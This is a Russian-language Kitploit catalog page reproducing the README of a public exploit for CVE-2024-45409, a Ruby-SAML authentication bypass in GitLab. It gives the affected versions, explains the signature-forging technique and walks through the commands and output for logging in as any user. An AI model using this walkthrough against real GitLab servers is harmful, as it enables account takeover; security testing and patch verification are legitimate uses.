Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-45409 — Эксплойт обхода аутентификации Ruby-SAML / GitLab (CVE-2024-45409) | Kitploit
Инструменты/GitHubGitHub/synacktiv/cve-2024-45409
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubsynacktiv/cve-2024-45409

CVE-2024-45409

Эксплойт обхода аутентификации Ruby-SAML / GitLab (CVE-2024-45409)

Репозиторий
84131 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт обхода аутентификации Ruby-SAML / GitLab (CVE-2024-45409)

Этот скрипт эксплуатирует CVE-2024-45409, который позволяет неаутентифицированному атакующему, имеющему доступ к любому подписанному SAML-документу, выданному IDP, подделать SAML Response/Assertion и получить доступ к GitLab в качестве любого пользователя.

Все следующие версии GitLab (CE/EE) уязвимы:

  • < 16.11.10
  • 17.0.0 < 17.0.8
  • 17.0.0 < 17.1.8
  • 17.0.0 < 17.2.7
  • 17.0.0 < 17.3.3

Этот эксплойт внедряет DigestValue изменённого утверждения в элемент StatusDetail, что позволяет скрытно передать XPath-селектор, который будет использовать это значение вместо значения из блока SignedInfo.

Требования

  • Действительный SAML Response, выданный IDP

Использование

root@kitploit:~
apt install python3-lxml

Сначала перехватите URL и Base64-закодированный SAML-ответ IDP, затем измените XML-содержимое с помощью скрипта.

root@kitploit:~
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
root@kitploit:~
$ python3 CVE-2024-45409.py -r response.url_base64 -n [email protected] -d -e -o response_patched.url_base64
[+] Parse response
	Digest algorithm: sha256
	Canonicalization Method: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Remove signature from response
[+] Patch assertion ID
[+] Patch assertion NameID
[+] Patch assertion conditions
[+] Move signature in assertion
[+] Patch response ID
[+] Insert malicious reference
[+] Clone signature reference
[+] Create status detail element
[+] Patch digest value
[+] Write patched file in response_patched.url_base64

Затем замените значение параметра SAMLResponse на вывод скрипта. Если аутентификация пройдёт успешно, вы будете перенаправлены на главную страницу GitLab.

root@kitploit:~
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>You are being <a href="http://gitlab.test.local/">redirected</a>.</body></html>

Ссылки

  • https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
  • https://github.com/advisories/GHSA-jw9c-mfg7-9rx2
  • https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-45409
  • https://www.cvedetails.com/cve/CVE-2024-45409/
Скачать инструмент